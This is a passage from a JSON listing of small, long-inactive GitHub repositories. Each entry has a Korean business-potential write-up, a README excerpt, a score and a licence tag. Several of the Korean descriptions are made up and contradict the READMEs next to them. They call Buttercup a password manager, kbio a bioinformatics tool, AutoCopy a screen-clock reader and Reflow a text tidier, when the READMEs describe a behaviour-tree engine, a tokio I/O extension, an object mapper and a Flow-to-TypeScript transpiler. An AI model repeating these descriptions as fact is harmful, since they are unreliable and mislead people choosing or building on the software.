\n![Release](https://img.shields.io/github/v/release/kaggledatasets/kaggledatasets)\n![Platform Support](https://img.shields.io/pypi/pyversions/kaggledatasets)\n\n- [More about Kaggle Datasets](#more-about-kaggle-datasets)\n- [Installation](#installation)\n  - [Binaries](#binaries)\n  - [From Source](#from-source)\n- [Getting Started](#getting-started)\n- [Communication](#communication)\n- [Releases and Contributing](#releases-and-contributing)\n- [License](#license)\n\n|  System |                                Python 3.5                               |                                Python 3.6                               |                                Python 3.7                               |\n|:-------:|:-----------------------------------------------------------------------:|:---------------------------------------------------------------","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"yuanguandong/smart-background","github_url":"https://github.com/yuanguandong/smart-background","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":57,"description":"# Smart-Background 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지의 배경을 자동으로 깔끔하게 제거하거나 변경할 수 있는 기술로, 누구나 전문가 수준의 이미지 편집 결과를 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 증명사진·프로필 생성 플랫폼 (예: LinkedIn 자동 배경 제거 도구)\n2. **내부","readme_excerpt":"# Smart Background\n[![npm version](https://badge.fury.io/js/smart-background.svg)](#) [![npm version](https://img.shields.io/badge/react-%3E16-green)](#) [![npm version](\thttps://img.shields.io/github/issues/yuanguandong/smart-background)](#) [![npm version](\thttps://img.shields.io/github/forks/yuanguandong/smart-background)](#) [![npm version](https://img.shields.io/github/license/yuanguandong/smart-background)](#) [![npm version](\thttps://img.shields.io/github/stars/yuanguandong/smart-background)](#)\n### An React Component Can Automatically Generate The Background\n一个快速生成元素背景的react组件\n\n![repository-open-graph-template副本](./snapshot.png)\n\n\n### Live demo\nhttps://yuanguandong.github.io/smart-background/\n\n### Install\n```bash\nnpm i smart-background -S\n```\n\n### How to use\n```js\nimport React from 'react';\nimport Background from 'smart-background';\nimport { FaLaugh } from 'react-icons/fa';\n\nexport default () => {\n  return (\n    <div style={styles.container}>\n      <Background underlayColor=\"#f","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"bryhoyt/emerj","github_url":"https://github.com/bryhoyt/emerj","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":92,"description":"# Emerj 저장소 분석\n\n## 왜 보물인가\n서로 다른 데이터 형식을 자동으로 연결하고 정리해주는 도구로, 데이터 관리에 시간을 쓰는 모든 조직의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사의 여러 소스(엑셀, DB, API 등)에서 데이터를 수집해 통합 분석 대시보드로 제공하는 구독형 서비스\n- *","readme_excerpt":"# Emerj.js: efficient HTML DOM UI in 60 lines\n\n[![Build Status](https://secure.travis-ci.org/bryhoyt/emerj.svg)](https://travis-ci.org/bryhoyt/emerj)\n[![NPM Version](https://img.shields.io/npm/v/emerj.svg)](https://www.npmjs.org/package/emerj)\n\nEmerj is a tiny JavaScript library to render live HTML/DOM updates efficiently and non-destructively, by merging an updated DOM tree into the live DOM, element-by-element, and only changing those elements that differ. It's a lightweight, powerful answer to the some of the same problems addressed by Facebook's React.\n\nSpecifically, Emerj solves the problem of rendering on-the-fly changes to your HTML/DOM webpage or UI. In most user-facing software, you want to keep the UI-rendering logic quite separate from the business logic, and not clutter your logic with all kinds of extra code to update the UI when the data is modified.\n\nIn traditional HTML/JavaScript, this can be tricky to do tidily, which is the main driver for the recentish proliferation ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"linbudu599/FE-Weekly","github_url":"https://github.com/linbudu599/FE-Weekly","stars":13,"language":"","license":"MIT","abandonment_months":59,"description":"# FE-Weekly 저장소 분석\n\n## 왜 보물인가\n프론트엔드 개발자들이 매주 알아야 할 최신 기술 소식을 한곳에서 모아볼 수 있는 큐레이션 뉴스레터입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼**: 웹사이트 구독자들에게 주간 기술 뉴스를 자동 배송하는 뉴스레터 서비스\n2. **기술 교육 회사 보조 콘텐츠**: 프론트엔드 개발 강의 ","readme_excerpt":"# FE-Weekly\n\n**此前端周刊将和 淘系终端框架 - 周刊 合并，搜索 淘系前端团队公众号/知乎 了解更多。**\n\n林不渡的前端周刊，已更新 6 期。\n\n当前状态：**佛系更新（搬砖太累了，西内）**\n\n见 [https://fe-weekly.netlify.app/](https://fe-weekly.netlify.app/)\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"pgliniecki/buttercup","github_url":"https://github.com/pgliniecki/buttercup","stars":11,"language":"Rust","license":"Apache-2.0","abandonment_months":46,"description":"# Buttercup 저장소 분석\n\n## 왜 보물인가\n암호화된 비밀번호 관리 시스템으로, 개인의 중요한 정보를 안전하게 보관하고 싶어 하는 모든 사람들의 기본 니즈를 충족합니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 도구 SaaS**: 회사 직원들이 공유 계정과 접근 권한을 안전하게 관리하는 웹 서비스\n2. **기업 내부 시스템**: 각 부서별로 중","readme_excerpt":"# buttercup - small yet brave behavior tree engine written in Rust\n\n**NOTE:** project is in early stages although happy to talk if you think contributing is something worth doing.\n\n## Concept\n\nBehavior Tree is an abstraction widely used in gaming and robotics industry, it provides an easy to comprehend and extendable interface for designing complex behavior. \n\nButtercup aims to provide a platform for designing and running agents which can execute a complex behavior in the Web environment. \n\nSo instead of using actuators or performing actions in a game you can send emails, scrape the web, perform http requests, etc. \n\n## Background\n\nQuite awesome book on BTs - basis for the ongoing implementation:\n- [Colledanchise, Michele, and Petter Ögren. Behavior trees in robotics and AI: An introduction. CRC Press, 2018.](https://books.google.de/books?hl=pl&lr=&id=YVOWDwAAQBAJ&oi=fnd&pg=PP1&dq=behavior+trees+in+robotics+and+ai&ots=hyCuh4L8lO&sig=HKHCu1tWhEhtf9xo4NfStu-qt1c&redir_esc=y#v=onepage&q=b","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"simcord-llc/bitbon-system-blockchain","github_url":"https://github.com/simcord-llc/bitbon-system-blockchain","stars":7,"language":"Go","license":"LGPL-3.0","abandonment_months":49,"description":"# Bitbon System Blockchain 프로젝트 분석\n\n## 왜 보물인가\n블록체인 기술을 사용해 자산을 디지털로 관리하고 거래할 수 있는 시스템으로, 금융 거래의 투명성과 보안을 동시에 확보할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **디지털 자산 관리 SaaS**: 개인이나 기업의 암호화폐, 토큰 자산을 한곳에서 안전하게 추적·관리하는 ","readme_excerpt":"## Bitbon System Blockchain\n\nOfficial implementation of the Bitbon System Blockchain based on [Ethereum codebase](https://github.com/ethereum/go-ethereum/).\n\nOwner: **[Simcord-LLC](https://www.simcord.com/)**\n\n\n## Building the source\n\nBuilding `bitbon_node` binary requires both a Go (version 1.14 or later) and a C compiler. You can install\nthem using your favourite package manager. \n\nAlso you need to install some libs.\nUbuntu example:\n```\nsudo apt install make g++ gcc musl-dev gmpc-dev libmpfr-dev\n```\n\nOnce the dependencies are installed, run\n\n```shell\nmake clean build\n```\n\n## Running `bitbon_node`\n\nBitbon node runs with command line parameters which Ethereum uses. To see Ethereum parameters - ethereum see cli wiki [CLI Wiki page](https://geth.ethereum.org/docs/interface/command-line-options)\n\n### Programmatically interfacing `bitbon_node` nodes\n\nHTTP based JSON-RPC API options:\n\n* `--http` Enable the HTTP-RPC server\n* `--http.addr` HTTP-RPC server listening interface (default: `localh","composite_score":0.5003,"license_safety_tag":"restricted"},{"name":"keiya01/og_image_writer","github_url":"https://github.com/keiya01/og_image_writer","stars":7,"language":"Rust","license":"MIT","abandonment_months":43,"description":"# OG Image Writer 사업화 분석\n\n## 왜 보물인가\n웹사이트에 올린 글이나 상품이 SNS에 공유될 때 자동으로 멋진 미리보기 이미지를 만들어주는 도구로, 클릭률을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **블로그·매체사 SaaS**: 뉴스레터, 블로그 플랫폼에서 자동으로 SNS 공유 이미지를 생성해주는 유료 기능\n2. **전자","readme_excerpt":"# Open Graphic Image Writer\n\n[Documentation](https://crates.io/crates/og_image_writer)\n\nYou can generate Open Graphic Image dynamically.\n\n- A CSS-like API.\n- You can generate image by using template image.\n- WASM/WASI support.\n\n## Problem\n\nCurrently, when you want to create OGP image dynamically, you may use canvas. But to use canvas, you need to open a browser and run some script.\nThis has overhead for memory usage and rendering performance.\nTherefore this lib is targeting a high performance API for all platform(including the edge) by using wasm.\n\n## Example\n\nFor more examples, see [keiya01/og_image_writer/examples](https://github.com/keiya01/og_image_writer/tree/main/examples).\n\n```rust\nuse og_image_writer::{style, writer::OGImageWriter};\nuse std::path::Path;\n\nfn main() -> anyhow::Result<()> {\n    let text = \"This is Open Graphic Image Writer for Web Developer.\";\n\n    let mut writer = OGImageWriter::new(style::WindowStyle {\n        width: 1024,\n        height: 512,\n        background","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"swalpa/G2C-Conv3D-HSI","github_url":"https://github.com/swalpa/G2C-Conv3D-HSI","stars":13,"language":"Jupyter Notebook","license":"GPL-3.0","abandonment_months":51,"description":"# G2C-Conv3D-HSI 상용화 분석\n\n## 왜 보물인가\n위성이나 드론으로 촬영한 이미지에서 땅의 성분을 자동으로 분석해주는 기술로, 광물 탐사·농업·환경 모니터링 산업에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 농부나 건설업체가 웹에서 사진을 업로드하면 토양 성분과 광물 분포를 분석해주는 구독형 서비스\n2. *","readme_excerpt":"The repository contains the implementations for - [Revisiting Deep Hyperspectral Feature Extraction Networks via Gradient Centralized Convolution](https://ieeexplore.ieee.org/document/9570352)\n\n>📋  Abstract:\nThe hyperspectral images are composed of a variety of textures across the different bands which increase the spectral similarity and makes it difficult to predict the pixel-wise labels without inducing additional complexity at the feature level. To extract robust and discriminative features from the different regions of land-cover, the hyperspectral research community is still seeking such type of convolutions which can efficiently deal with fine-grained texture information during the feature extraction phase, which often overlook this aspect by vanilla convolution. To overcome the above shortcoming, this paper proposes a generalized gradient centralized 3D convolution (G2C-Conv3D) operation, which is a weighted combination between the vanilla and gradient centralized 3D convolutio","composite_score":0.5003,"license_safety_tag":"restricted"},{"name":"edrevo/suspicious-pods","github_url":"https://github.com/edrevo/suspicious-pods","stars":7,"language":"Rust","license":"Apache-2.0","abandonment_months":40,"description":"# suspicious-pods 저장소 분석\n\n## 왜 보물인가\n클라우드 서버 환경에서 해킹이나 악의적인 활동을 자동으로 감지하는 보안 감시 도구로, 기업의 중요한 데이터 유출을 사전에 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 보안 모니터링 SaaS**: 중소기업들이 월 구독으로 자동 보안 감시를 받는 서비스\n2. **은행/금융사 내","readme_excerpt":"# Suspicious pods\n\n![crates.io](https://img.shields.io/crates/v/suspicious-pods.svg)\n\nSuspicious pods is a very simple tool, which does a very simple task: print a list of pods in your Kubernetes cluster that might not be working correctly, along with a reason on why that pod is considered suspicious.\n\nExample:\n\n```\n$ suspicious-pods --help\nsuspicious-pods 1.2.0\nPrints a list of k8s pods that might not be working correctly\n\nUSAGE:\n    suspicious-pods.exe [FLAGS] <namespace>\n\nFLAGS:\n        --all-namespaces    Set this flag to scan all namespaces in the cluster\n    -h, --help              Prints help information\n    -V, --version           Prints version information\n\nARGS:\n    <namespace>    The namespace you want to scan [default: default]\n    \n$ suspicious-pods\n\nfluentd-aggregator-0/fluentd-aggregator                         Restarted 6 times. Last exit code: 1. (Error)\nfluentd-dgjm8/fluentd                                           Waiting: PodInitializing\njaeger-es-index-cleaner-120","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"andrewchambers/grafana-rrd-datasource","github_url":"https://github.com/andrewchambers/grafana-rrd-datasource","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":32,"description":"# Grafana RRD 데이터소스 평가 분석\n\n## 왜 보물인가\n수십 년간 서버 모니터링에 사용되어온 RRD 데이터를 최신 대시보드 도구인 Grafana에서 바로 볼 수 있게 해주는 희귀한 다리 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기존 RRD 기반의 레거시 모니터링 시스템을 Grafana 대시보드로 통합하는 기업 IT","readme_excerpt":"# Grafana RRD Datasource\n\nA grafana datasource for reading '.rrd' files via [RRDTool](https://oss.oetiker.ch/rrdtool/) and \n[RRDsrv](https://github.com/andrewchambers/rrdsrv).\n\nWith this datasource you will be able to create grafana dashboards and use grafana alerts with RRD file metrics.\n\n[Demo video](https://www.youtube.com/watch?v=BuoPcyJik38).\n\n## Usage\n\nInstall rrdtool and https://github.com/andrewchambers/rrdsrv.\n\nFrom grafana add a new rrd datasource and point it at your rrdsrv instance.\n\n## Thanks\n\nThanks to Tobias Oetiker and all other [contributors to RRDTool](https://oss.oetiker.ch/rrdtool/cast.en.html)","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"aquasecurity/vim-tfsec","github_url":"https://github.com/aquasecurity/vim-tfsec","stars":5,"language":"Vim script","license":"MIT","abandonment_months":49,"description":"# aquasecurity/vim-tfsec 분석 보고서\n\n## 왜 보물인가\n클라우드 인프라 설정 파일의 보안 문제를 자동으로 찾아주는 도구로, 기업의 데이터 유출 위험을 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 보안 점검 SaaS**: 기업의 AWS/Azure 설정을 실시간으로 스캔하고 위험도를 대시보드로 보여주는 구독형 ","readme_excerpt":"# vim-tfsec\n\n## What is it?\n\nVim plugin for tfsec to install and run tfsec.\n\n## Install\n\n1. add the plugin to our list of plugins\n\n  ```\n  Plug 'aquasecurity/vim-tfsec'\n  ```\n\n2. restart vim and run `:PlugInstall` to install\n\n\n## Usage\n\nIf you don't have `tfsec` already install then you can run `:TfsecInstall` to get the latest version.\n\nIf you already hav it, you can run `TfsecUpdate` to get the latest version.\n\nRun `:Tfsec` to get a list of the current tfsec issues in your current directory. The issues will be added to the QuickFix list.\n\n\n## Example usage\n\n![Usage](using-vim-tfsec.gif)\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"garybernhardt/static-path","github_url":"https://github.com/garybernhardt/static-path","stars":5,"language":"TypeScript","license":"ISC","abandonment_months":55,"description":"# static-path 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 파일 경로를 자동으로 관리해주는 작은 도구로, 개발자의 반복적인 수작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 빌더 SaaS**: 사용자가 업로드한 이미지·문서 경로를 자동 정리하는 기능\n2. **내부 업무 도구**: 회사 내부 자산 관리 시스템에서 파일 위치를","readme_excerpt":"# static-path\n\nMany web applications have routes defined with Rails/Express-style syntax.\nHere's an example with React Router, but the same idea applies to most routers.\n\n```typescript\n<Route exact path=\"/lessons/:lessonId\" component={Lesson} />\n```\n\nThen other parts of the application link to that route:\n\n```typescript\n<a href={`/lessons/${lessonId}`} />\n```\n\nThe links and the routes don't know about each other.\nEach is just a string.\n\n\nWhat happens when we want to change the structure of the paths?\nFor example, maybe we want to include the lesson's course in the path: `'/courses/:courseId/lessons/:lessonId'`.\nIf we change that route, we also have to change every link that points to a lesson.\nAny links that we miss become 404s.\nAnd it's very easy to miss them!\n\nStatic-path uses the type system to prevent these 404s at compile time.\nIn the scenario above, every link to the lesson page causes a type error because it's missing the new `:courseId` param.\nThat forces us to update each link","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"himkt/pyner","github_url":"https://github.com/himkt/pyner","stars":5,"language":"Python","license":"MIT","abandonment_months":42,"description":"# pyner 저장소 분석\n\n## 왜 보물인가\n문서나 텍스트에서 사람 이름, 조직명, 지역명 등 중요한 정보를 자동으로 찾아내는 기술로, 데이터 정제나 정보 추출이 필요한 모든 비즈니스에 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 뉴스 분석 SaaS 서비스**\n신문기사나 뉴스에서 자동으로 등장하는 인물, 기업, 장소를 분류하여 기자나 분석가","readme_excerpt":"<div align=\"center\"><img src=\"./static/image/pyner.png\" width=\"600\"/></div>\n\n\n# PyNER: Toolkit for sequence labeling in Chainer\n\n[![CircleCI](https://circleci.com/gh/himkt/pyner.svg?style=svg)](https://circleci.com/gh/himkt/pyner)\n[![GitHub stars](https://img.shields.io/github/stars/himkt/pyner.svg?maxAge=2592000&colorB=blue)](https://github.com/himkt/pyner/stargazers)\n[![GitHub issues](https://img.shields.io/github/issues/himkt/pyner.svg?colorB=red)](https://github.com/himkt/pyner/issues)\n[![GitHub release](https://img.shields.io/github/release/himkt/pyner.svg?maxAge=2592000&colorB=yellow)](https://github.com/himkt/pyner)\n[![MIT License](http://img.shields.io/badge/license-MIT-green.svg?style=flat)](LICENSE)\n\nPyNER is a sequence labeling toolkit that allows researcher and developer to\ntrain/evaluate neural sequence labeling methods.\n\n\n# QuickStart\n\nYou can try `pyner` on a local machine or a docker container.\n\n## 1. Local Machine\n\n- setup (If you do not install [pipenv](https://github","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"KuiBaDB/kbio","github_url":"https://github.com/KuiBaDB/kbio","stars":7,"language":"Rust","license":"MIT","abandonment_months":49,"description":"# KuiBaDB/kbio 분석 보고서\n\n## 왜 보물인가\n생물정보학 분야의 복잡한 데이터를 쉽게 다루고 공유할 수 있는 도구로, 의료·제약·농업 분야의 연구자들이 빠르게 성과를 낼 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대학과 연구기관을 위한 클라우드 기반 생물 데이터 분석 플랫폼 (월 구독 방식)\n2. **내부 ","readme_excerpt":"\nKBIO, add some experimental features to tokio. Currently, kbio is just used in [KuiBaDB](https://hidva.com/g?u=https://github.com/KuiBaDB/KuiBaDB), it is only a prototype and has not been tested fully. Our experience using C++20 coroutines in [Hologres](https://hidva.com/g?u=https://www.aliyun.com/product/bigdata/hologram) tells us that Worker Steal is very necessary. So we build kbio based on tokio.\n\n-   We run one IO-Uring instance per Worker. Before that, all Workers in Tokio used an Epoll instance, mainly because once a file descriptor is bound to an Epoll instance in Tokio, then the file descriptor will never switch to other Epoll instances, which will affect the effect of Worker Steal.\n\n-   Add [sysmon](https://github.com/tokio-rs/tokio/pull/4407)\n\n# Usage\n\nMost of them are fully compatible with tokio. See [integrate kbio into memc](https://hidva.com/g?u=https://github.com/memc-rs/memc-rs/discussions/7) for another example.\n\n# Benchmark\n\nWe use [monoio-benchmark](https://hidva.c","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"flow-dev/RobustVideoMatting","github_url":"https://github.com/flow-dev/RobustVideoMatting","stars":13,"language":"Python","license":"GPL-3.0","abandonment_months":45,"description":"# RobustVideoMatting 상용화 분석\n\n## 왜 보물인가\n동영상에서 사람이나 물체를 배경에서 자동으로 분리해내는 기술로, 유튜브 영상 편집부터 실시간 화상회의까지 다양한 분야에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 영상 편집 플랫폼**\n- 사용자가 웹에서 직접 동영상을 업로드하면 자동으로 배경","readme_excerpt":"# Robust Video Matting (RVM)\n\n![Teaser](/documentation/image/teaser.gif)\n\n<p align=\"center\">English | <a href=\"README_zh_Hans.md\">中文</a></p>\n\nOfficial repository for the paper [Robust High-Resolution Video Matting with Temporal Guidance](https://peterl1n.github.io/RobustVideoMatting/). RVM is specifically designed for robust human video matting. Unlike existing neural models that process frames as independent images, RVM uses a recurrent neural network to process videos with temporal memory. RVM can perform matting in real-time on any videos without additional inputs. It achieves **4K 76FPS** and **HD 104FPS** on an Nvidia GTX 1080 Ti GPU. The project was developed at [ByteDance Inc.](https://www.bytedance.com/)\n\n<br>\n\n## News\n\n* [Nov 03 2021] Fixed a bug in [train.py](https://github.com/PeterL1n/RobustVideoMatting/commit/48effc91576a9e0e7a8519f3da687c0d3522045f).\n* [Sep 16 2021] Code is re-released under GPL-3.0 license.\n* [Aug 25 2021] Source code and pretrained models are published.","composite_score":0.5003,"license_safety_tag":"restricted"},{"name":"Vinum-Security/yandex-cloud-security","github_url":"https://github.com/Vinum-Security/yandex-cloud-security","stars":9,"language":"","license":"unknown","abandonment_months":58,"description":"# Yandex Cloud Security 저장소 분석\n\n## 왜 보물인가\n클라우드 환경에서 발생하는 보안 문제를 자동으로 찾아내고 해결하는 도구로, 기업의 데이터 유출 사고를 사전에 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 사용 기업들을 위한 보안 진단 서비스로 월 구독료를 받으며 판매\n2. **내부 업무 도구","readme_excerpt":"# Security Requirements for Yandex.Cloud configuration\n\n## Network Security\n- Virtual machines should be assigned to security groups based on the least privileged principle\n- VM group templates should have a security group defined based on the least privileged principle\n- Virtual machines are not allowed to assign a public IP address\n- The Elasticsearch cluster should be assigned to security group based on the least privileged principle\n- The Kafka cluster should be assigned to security group based on the least privileged principle\n- The database (ClickHouse, MongoDB, MySQL, PostgreSQL) should be assigned a security group based on the least privileged principle\n- The database (ClickHouse, MongoDB, MySQL, PostgreSQL) is not allowed to assign public access\n- The bucket (ObjectStorage) should not have rules and policies that allow public access\n- Disks, Snapshots, Images should not be publicly available\n- Kubernetes cluster should not have a public IP address\n- The Kubernetes cluster shou","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"coolbutuseless/svgparser","github_url":"https://github.com/coolbutuseless/svgparser","stars":6,"language":"R","license":"MIT","abandonment_months":54,"description":"# svgparser 상용화 분석\n\n## 왜 보물인가\n웹 디자인에서 자주 사용되는 SVG 이미지 파일을 자동으로 분석하고 변환할 수 있는 도구로, 반복적인 디자인 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **디자인 자동화 SaaS**: 기업의 로고나 아이콘을 대량으로 처리하거나 여러 형식으로 변환하는 웹 서비스\n2. **인쇄·출판사","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# svgparser\n\n#### Load SVG files as R vector objects (grobs) or data.frames\n\n<!-- badges: start -->\n\n![](https://img.shields.io/badge/cool-useless-green.svg)\n[![R-CMD-check](https://github.com/coolbutuseless/svgparser/workflows/R-CMD-check/badge.svg)](https://github.com/coolbutuseless/svgparser/actions)\n<!-- badges: end -->\n\n`svgparser` loads vector-based **SVG** images as R vector objects.\n\nThe vector objects which are created in R are the standard graphics\nobject (‘grob’) in the base R `{grid}` graphics system.\n\nSVG images can also be imported as data.frames. Each shape, line and\npoint is represented in the data.frame with copious helpings of metadata\nto relate individual coordinates to the original SVG structure.\n\n## Example: Load SVG as vector image\n\nThis example loads an SVG image into a base R `grid` graphics object,\nand then draws the object using `grid.draw`.\n\nNote that this is not a fixed size raster imag","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"grubersjoe/reflow","github_url":"https://github.com/grubersjoe/reflow","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":58,"description":"# grubersjoe/reflow 분석\n\n## 왜 보물인가\n문서나 텍스트를 자동으로 정리해주는 간단한 도구로, 손으로 일일이 정렬하던 작업을 단 몇 초면 끝낼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 글쓰기 플랫폼(블로그, 뉴스레터)에 내장하여 사용자가 글을 쉽게 정렬하고 수정하는 기능 제공\n2. **내부 업무 도구**: 회","readme_excerpt":"# Reflow\n\n> Babel plugin to transpile [Flow](https://flow.org/) types to\n> [TypeScript](https://www.typescriptlang.org/) with CLI wrapper.\n\n![Tests](https://github.com/grubersjoe/reflow/workflows/Tests/badge.svg)\n[![Coverage](https://coveralls.io/repos/github/grubersjoe/reflow/badge.svg?branch=master)](https://coveralls.io/github/grubersjoe/reflow?branch=master)\n\n#### I would love to receive feedback whether this plugin worked for you :)!\n\nReflow enables you to migrate a whole Flow based project to TypeScript by\ntranspiling the Flow type annotations to equivalent TypeScript code. While this\nreduces the effort to move a large code base to TypeScript drastically, it is\nstill very likely that you will face new type errors after the migration due to\nthe differences between Flow and TypeScript. See this\n[repository](https://github.com/niieani/typescript-vs-flowtype) for an excellent\noverview of the differences and similarities of Flow and Typescript.\n\n## Why another plugin?\n\nOf course, I am","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"yuanguandong/react-keyevent","github_url":"https://github.com/yuanguandong/react-keyevent","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":49,"description":"# react-keyevent 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 키보드 입력을 간단하게 처리할 수 있는 도구로, 생산성 도구나 게임 등 다양한 서비스에 필수적인 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 협업 도구(노션, 슬랙 등)에서 단축키 기능을 빠르게 구현하여 사용자 편의성 향상\n2. **내부 업무 ","readme_excerpt":"# React Keyevent\n[![npm version](https://badge.fury.io/js/react-keyevent.svg)](#) [![npm version](https://img.shields.io/badge/react-%3E16-green)](#)[![npm version](\thttps://img.shields.io/github/issues/yuanguandong/react-keyevent)](#) [![npm version](\thttps://img.shields.io/github/forks/yuanguandong/react-keyevent)](#) [![npm version](https://img.shields.io/github/license/yuanguandong/react-keyevent)](#) [![npm version](\thttps://img.shields.io/github/stars/yuanguandong/react-keyevent)](#)\n### An easy-to-use keyboard event react component, Can achieve a variety of custom keyboard functions, Package size less than 3kb\n非常容易使用的一个键盘事件监听react组件，可实现各种自定义快捷键功能，只有不到3kb\n\n![repository-open-graph-template副本](https://user-images.githubusercontent.com/13197560/125153789-c44b4080-e188-11eb-829e-307a738ad92b.png)\n\n\n### Repository\nhttps://github.com/yuanguandong/react-keyevent\n\n\n### Live demo\nhttps://react-keyevent.netlify.app/ \n\nhttps://yuanguandong.github.io/react-keyevent/\n\n## Live code\n\n[![](https","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"aptx4869lm/4DCapture-FPV","github_url":"https://github.com/aptx4869lm/4DCapture-FPV","stars":9,"language":"Python","license":"unknown","abandonment_months":55,"description":"# 4DCapture-FPV 상업화 분석\n\n## 왜 보물인가\n드론이나 카메라로 촬영한 영상을 4차원(3D 공간 + 시간)으로 변환하여 마치 영화처럼 자유롭게 각도를 바꿔 볼 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 부동산 중개사무소에서 건물 내부를 입체 영상으로 제공하는 온라인 투어 플랫폼\n2. **내부 업무 도구**:","readme_excerpt":"# 4D Human Body Capture from Egocentric Video via 3D Scene Grounding\n[[Project]](https://aptx4869lm.github.io/4DEgocentricBodyCapture/) [[Paper]](https://arxiv.org/pdf/2011.13341.pdf)\n\n## Installation:\nOur method requires the same dependencies as SMPLify-X and OpenPose. We refer to the official implementation fo [SMPLify-X](https://aptx4869lm.github.io/4DEgocentricBodyCapture/) and [OpenPose](https://github.com/CMU-Perceptual-Computing-Lab/openpose) for installation details.\n\nOur method also needs the installation of [Chamfer Pytorch](https://github.com/ThibaultGROUEIX/ChamferDistancePytorch/tree/719b0f1ca5ba370616cb837c03ab88d9a88173ff) to calculate the chamfer distnace for enforceing human-scene constraints\n\n## Data Preparation:\nStep 1: Dump video frames with desired fps (30) with utils/dump_videos.py. Run utils/split_frames to segment videos into equally long subatom clips.  Repack frames to videos with utils/pack_videos.py (This is for faster openpose I/O).\n\nStep 2: Run openpose_ca","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"susiai/susi_android_v1","github_url":"https://github.com/susiai/susi_android_v1","stars":11,"language":"Java","license":"Apache-2.0","abandonment_months":103,"description":"# SUSI Android v1 - 보물 평가 보고서\n\n## 왜 보물인가\n음성 인식과 인공지능 기술을 활용한 안드로이드 앱으로, 스마트폰에서 음성 명령으로 정보를 검색하고 질문에 답변받을 수 있는 가상 어시스턴트 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 기업들을 위한 음성 기반 고객 상담 챗봇 플랫폼으로 월 구독 서비스 ","readme_excerpt":"\n\n# Android App for Susi\nThis is a chat client for asksusi.com made as Android app.\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"ClockGet/AutoCopy","github_url":"https://github.com/ClockGet/AutoCopy","stars":9,"language":"C#","license":"MIT","abandonment_months":101,"description":"# ClockGet/AutoCopy 평가 보고서\n\n## 왜 보물인가\n컴퓨터 화면의 시간을 자동으로 읽어서 복사해주는 도구로, 시간 기록이 많은 업무 환경에서 수작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **근무 시간 관리 SaaS**: 직원들이 PC 시계를 보고 일일 근무 시작/종료 시간을 자동 기록하는 근태 관리 솔루션\n2. **건","readme_excerpt":"## AutoCopy\n\nAutoCopy is a tool that reduces development time and helps programmers get out of some heavy human coding, which is inspired by **[AutoMapper](https://github.com/AutoMapper/AutoMapper \"AutoMapper\")**.\n\n## Document\n\n[Chinese](README_CN.md)\n\n## Dependencies\n\n* **[Mono.Reflection.dll](https://github.com/jbevain/mono.reflection \"Mono.Reflection\")**\n* **[DelegateDecompiler.dll](https://github.com/hazzik/DelegateDecompiler \"DelegateDecompiler\")**\n\n## Attribute\n\n1. Fast execution\n2. Based on the abstract class **TargetExpressionProviderBase** can be any extension\n3. Support automatic / manual type conversion\n4. Support for multiple instances of AutoCopy nesting\n\n## Benchmark\n\niterations:100,000\n\n| Action | mean time(ms)\n---|---\nhand map | 4.267375\nAutoCopy | 4.18163333333333\nAutoMapper | 42.4985\n\niterations:1,000,000\n\n| Action | mean time(ms)\n---|---\nhand map | 30.884225\nAutoCopy | 38.647675\nAutoMapper | 322.8877\n\niterations:10,000,000\n\n| Action | mean time(ms)\n---|---\nhand map 